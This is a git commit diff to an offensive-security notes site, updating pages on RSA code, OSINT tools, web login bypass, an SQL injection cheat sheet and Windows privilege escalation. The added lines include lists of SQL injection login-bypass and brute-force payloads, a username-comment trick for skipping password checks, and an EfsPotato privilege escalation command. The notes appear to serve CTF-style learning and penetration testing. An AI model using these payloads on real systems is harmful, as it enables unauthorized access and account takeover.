update osint

hideckies · Mar 7, 2024 · 969a1cd · 969a1cd
1 parent 9330704
commit 969a1cd
Show file tree

Hide file tree

Showing 5 changed files with 65 additions and 33 deletions.
diff --git a/src/exploit/cryptography/algorithm/rsa.md b/src/exploit/cryptography/algorithm/rsa.md
@@ -4,7 +4,7 @@ description: RSA is a public-key cryptosystem that is widely used for secure dat
 tags:
     - Cryptography
 refs:
-date: 2023-09-07
+date: 2024-03-08
 draft: false
 ---
 
@@ -23,10 +23,10 @@ class RSA:
 		self.q = getPrime(512)
 
 		# calculate n (n is used for both the public key (n, e) and the private key (n, d))
-		self.n = p * q
+		self.n = self.p * self.q
 
 		# calculate t (totient, or called as 'phi')
-		self.t = (p - 1) * (q - 1)
+		self.t = (self.p - 1) * (self.q - 1)
 
 		# calculate e (e is one of the puclic key (n, e))
 		for i in range(2, self.t):

diff --git a/src/exploit/reconnaissance/osint/osint.md → src/exploit/reconnaissance/osint/index.md b/src/exploit/reconnaissance/osint/osint.md → src/exploit/reconnaissance/osint/index.md
@@ -7,7 +7,7 @@ tags:
     - Reconnaissance
     - Web
 refs:
-date: 2024-01-18
+date: 2024-03-08
 draft: false
 ---
 
@@ -39,6 +39,7 @@ draft: false
 - [urlscan.io](https://urlscan.io/)
 - [ViewDNS.info](https://viewdns.info/)
 - [Wappalyzer](https://www.wappalyzer.com/)
+- [Web Check](https://web-check.xyz/)
 - [Whoxy](https://www.whoxy.com/)
 - [WhoisXML](https://www.whoisxmlapi.com/)
 

diff --git a/src/exploit/web/method/web-login-bypass.md b/src/exploit/web/method/web-login-bypass.md
@@ -6,7 +6,7 @@ tags:
     - Web
 refs:
     - https://tryhackme.com/room/nosqlinjectiontutorial
-date: 2024-02-08
+date: 2024-03-08
 draft: false
 ---
 
@@ -43,41 +43,43 @@ root:password
 
 ## SQL Injections
 
+Try the following inputs in the form.
+
 ```txt
+'
+'--
+'-- -
+'#
+}'
+}'--
+}'-- -
+}'#
+' or 1=1
+' or 1=1--
+' or 1=1-- -
 ' or '1'='1
 ' or '1'='1--
-or true--
+' or '1'='1-- -
 ' or true--
+' or true-- -
+or true--
 
-UNION SELECT null--
-' UNION SELECT null--
+' UNION SELECT NULL--
+' UNION SELECT NULL,NULL--
 ' UNION SELECT 1,2--
+UNION SELECT NULL--
 ```
 
-### Microsoft, Oracle, PostgreSQL
+### Password Omitting
 
-```txt
-'--
-' or 1=1--
-' or '1'='1'--
+If we know the username of an existing account, try to add prefix `'-- -` to the username for forcing the server internally to omit the password.
 
-}" or 1=1--
+```bash
+username: john'-- -
+password: password123 (arbitrary value)
 ```
 
-### MySQL
-
-```txt
-'-- -
-'#
-
-' or 1=1#
-' or 1=1-- -
-
-' or '1'='1'-- -
-' or '1'='1'#
-
-}" or 1=1-- -
-```
+When the login is successful, not only can we log in with that user, but we can also fuzz with other usernames.
 
 <br />
 

diff --git a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
@@ -10,7 +10,7 @@ refs:
     - https://portswigger.net/web-security/sql-injection/blind
     - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
     - https://tryhackme.com/room/adventofcyber2023
-date: 2024-02-13
+date: 2024-03-08
 draft: false
 ---
 
@@ -72,12 +72,11 @@ Comment syntax is depending on the database used in the website.
 |SQLite|`--`|
 ||`/*comment*/`|
 
-
 <br />
 
 ## Basic Injection
 
-First off, check if we can inject SQL commands into forms or URL params in the target website.
+Check if we can inject SQL commands into forms or URL params in the target website.
 
 ```txt
 ' OR 1=1--
@@ -109,7 +108,9 @@ admin or 1=1-- -
 admin or 1=1#
 ```
 
-### Blind Injection - Timing
+<br />
+
+## Blind Injection - Timing
 
 Reference: [https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing](https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing)
 
@@ -137,6 +138,18 @@ test' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))
 
 <br />
 
+## Brute Force Values
+
+```html
+' password LIKE '%'-- -
+' password LIKE BINARY '%'-- -
+
+' password REGEXP '^[a-z]*'-- -
+' password REGEXP BINARY '^[a-z]*'-- -
+```
+
+<br />
+
 ## WAF Bypass
 
 Reference: [https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF)

diff --git a/src/exploit/windows/privilege-escalation/windows-privesc-with-localpotato.md b/src/exploit/windows/privilege-escalation/windows-privesc-with-localpotato.md
@@ -11,10 +11,26 @@ refs:
     - https://tryhackme.com/room/localpotato
     - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer
     - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
-date: 2023-10-26
+date: 2024-03-08
 draft: false
 ---
 
+## EfsPotato
+
+### Required Privilege
+
+- `SeImpersonatePrivilege`
+
+### Payloads
+
+- [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
+
+```bash
+EfsPotato "cmd.exe /c whoami"
+```
+
+<br />
+
 ## GodPotato
 
 ### Required Privileges